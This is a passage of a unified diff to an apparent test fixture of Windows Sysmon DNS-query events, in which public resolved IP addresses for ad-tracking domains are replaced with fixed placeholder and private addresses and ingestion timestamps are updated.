Name='QueryResults'\u003etype: 5 td.thebrighttag.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:08.054Z", @@ -16678,12 +16495,12 @@ "type": "CNAME" }, { - "data": "54.192.55.189", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "54.192.55.189" + "89.160.20.156" ] }, "network": { @@ -16699,13 +16516,13 @@ "t.a3cloud.net" ], "ip": [ - "54.192.55.189" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742407500Z", + "ingested": "2021-12-09T13:50:23.457509900Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.053883400Z'/\u003e\u003cEventRecordID\u003e186\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.050\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003et.a3cloud.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 d386jaag4hn9zl.cloudfront.net;::ffff:54.192.55.189;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.053883400Z'/\u003e\u003cEventRecordID\u003e186\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.050\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003et.a3cloud.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 d386jaag4hn9zl.cloudfront.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:09.053Z", @@ -16773,12 +16590,12 @@ "type": "CNAME" }, { - "data": "204.154.111.122", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "204.154.111.122" + "89.160.20.156" ] }, "network": { @@ -16795,13 +16612,13 @@ "tps618.doubleverify.com" ], "ip": [ - "204.154.111.122" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742417700Z", + "ingested": "2021-12-09T13:50:23.457515800Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.053900700Z'/\u003e\u003cEventRecordID\u003e187\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.070\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etps618.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 nycp-hlb.doubleverify.com;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:204.154.111.122;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.053900700Z'/\u003e\u003cEventRecordID\u003e187\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.070\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etps618.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 nycp-hlb.doubleverify.com;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:09.053Z", @@ -16873,52 +16690,52 @@ "type": "CNAME" }, { - "data": "54.157.69.185", + "data": "89.160.20.156", "type": "A" }, { - "data": "18.209.139.81", + "data": "89.160.20.156", "type": "A" }, { - "data": "18.233.36.36", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.54.198.81", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.55.201.28", + "data": "89.160.20.156", "type": "A" }, { - "data": "18.210.34.44", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.72.163.149", + "data": "89.160.20.156", "type": "A" }, { - "data": "18.232.198.130", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" } ], "resolved_ip": [ - "54.157.69.185", - "18.209.139.81", - "18.233.36.36", - "52.54.198.81", - "52.55.201.28", - "18.210.34.44", - "52.72.163.149", - "18.232.198.130", - "192.5.6.30" + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30" ] }, "network": { @@ -16936,21 +16753,14 @@ "dpm.demdex.net" ], "ip": [ - "54.157.69.185", - "18.209.139.81", - "18.233.36.36", - "52.54.198.81", - "52.55.201.28", - "18.210.34.44", - "52.72.163.149", - "18.232.198.130", - "192.5.6.30" + "89.160.20.156", + "192.168.6.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742422Z", + "ingested": "2021-12-09T13:50:23.457521700Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.053914100Z'/\u003e\u003cEventRecordID\u003e188\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.090\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edpm.demdex.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 gslb-2.demdex.net;type: 5 edge-va6.demdex.net;type: 5 dcs-edge-va6-802167536.us-east-1.elb.amazonaws.com;::ffff:54.157.69.185;::ffff:18.209.139.81;::ffff:18.233.36.36;::ffff:52.54.198.81;::ffff:52.55.201.28;::ffff:18.210.34.44;::ffff:52.72.163.149;::ffff:18.232.198.130;192.5.6.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.053914100Z'/\u003e\u003cEventRecordID\u003e188\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.090\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edpm.demdex.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 gslb-2.demdex.net;type: 5 edge-va6.demdex.net;type: 5 dcs-edge-va6-802167536.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:09.053Z", @@ -17018,39 +16828,39 @@ "type": "CNAME" }, { - "data": "68.67.179.228", + "data": "89.160.20.156", "type": "A" }, { - "data": "68.67.180.44", + "data": "89.160.20.156", "type": "A" }, { - "data": "204.13.192.141", + "data": "89.160.20.156", "type": "A" }, { - "data": "68.67.178.230", + "data": "89.160.20.156", "type": "A" }, { - "data": "68.67.178.252", + "data": "89.160.20.156", "type": "A" }, { - "data": "68.67.179.23", + "data": "89.160.20.156", "type": "A" }, { - "data": "68.67.179.232", + "data": "89.160.20.156", "type": "A" }, { - "data": "68.67.180.12", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -17058,22 +16868,22 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" } ], "resolved_ip": [ - "68.67.179.228", - "68.67.180.44", - "204.13.192.141", - "68.67.178.230", - "68.67.178.252", - "68.67.179.23", - "68.67.179.232", - "68.67.180.12", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30" + "192.168.14.30" ] }, "network": { @@ -17090,23 +16900,16 @@ "secure.adnxs.com" ], "ip": [ - "68.67.179.228", - "68.67.180.44", - "204.13.192.141", - "68.67.178.230", - "68.67.178.252", - "68.67.179.23", - "68.67.179.232", - "68.67.180.12", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30" + "192.168.14.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742426600Z", + "ingested": "2021-12-09T13:50:23.457527500Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.053938800Z'/\u003e\u003cEventRecordID\u003e189\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.308\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esecure.adnxs.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 g.geogslb.com;type: 5 ib.anycast.adnxs.com;::ffff:68.67.179.228;::ffff:68.67.180.44;::ffff:204.13.192.141;::ffff:68.67.178.230;::ffff:68.67.178.252;::ffff:68.67.179.23;::ffff:68.67.179.232;::ffff:68.67.180.12;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.053938800Z'/\u003e\u003cEventRecordID\u003e189\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.308\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esecure.adnxs.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 g.geogslb.com;type: 5 ib.anycast.adnxs.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:09.053Z", @@ -17174,12 +16977,12 @@ "type": "CNAME" }, { - "data": "204.154.111.122", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "204.154.111.122" + "89.160.20.156" ] }, "network": { @@ -17196,13 +16999,13 @@ "tps.doubleverify.com" ], "ip": [ - "204.154.111.122" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742430400Z", + "ingested": "2021-12-09T13:50:23.457533300Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.053949300Z'/\u003e\u003cEventRecordID\u003e190\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.478\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etps.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 tps-geo.dvgtm.akadns.net;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:204.154.111.122;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.053949300Z'/\u003e\u003cEventRecordID\u003e190\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.478\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etps.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 tps-geo.dvgtm.akadns.net;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:09.053Z", @@ -17266,39 +17069,39 @@ "type": "CNAME" }, { - "data": "52.71.175.22", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.71.208.229", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.86.201.172", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.7.6.198", + "data": "89.160.20.156", "type": "A" }, { - "data": "54.152.156.164", + "data": "89.160.20.156", "type": "A" }, { - "data": "54.152.56.202", + "data": "89.160.20.156", "type": "A" }, { - "data": "54.164.15.83", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.86.191.75", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -17306,22 +17109,22 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" } ], "resolved_ip": [ - "52.71.175.22", - "52.71.208.229", - "52.86.201.172", - "52.7.6.198", - "54.152.156.164", - "54.152.56.202", - "54.164.15.83", - "52.86.191.75", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30" + "192.168.14.30" ] }, "network": { @@ -17337,23 +17140,16 @@ "i.liadm.com" ], "ip": [ - "52.71.175.22", - "52.71.208.229", - "52.86.201.172", - "52.7.6.198", - "54.152.156.164", - "54.152.56.202", - "54.164.15.83", - "52.86.191.75", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30" + "192.168.14.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742439400Z", + "ingested": "2021-12-09T13:50:23.457539400Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067752300Z'/\u003e\u003cEventRecordID\u003e191\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.536\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ei.liadm.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 idaas-production.us-east-1.elasticbeanstalk.com;::ffff:52.71.175.22;::ffff:52.71.208.229;::ffff:52.86.201.172;::ffff:52.7.6.198;::ffff:54.152.156.164;::ffff:54.152.56.202;::ffff:54.164.15.83;::ffff:52.86.191.75;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067752300Z'/\u003e\u003cEventRecordID\u003e191\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.536\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ei.liadm.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 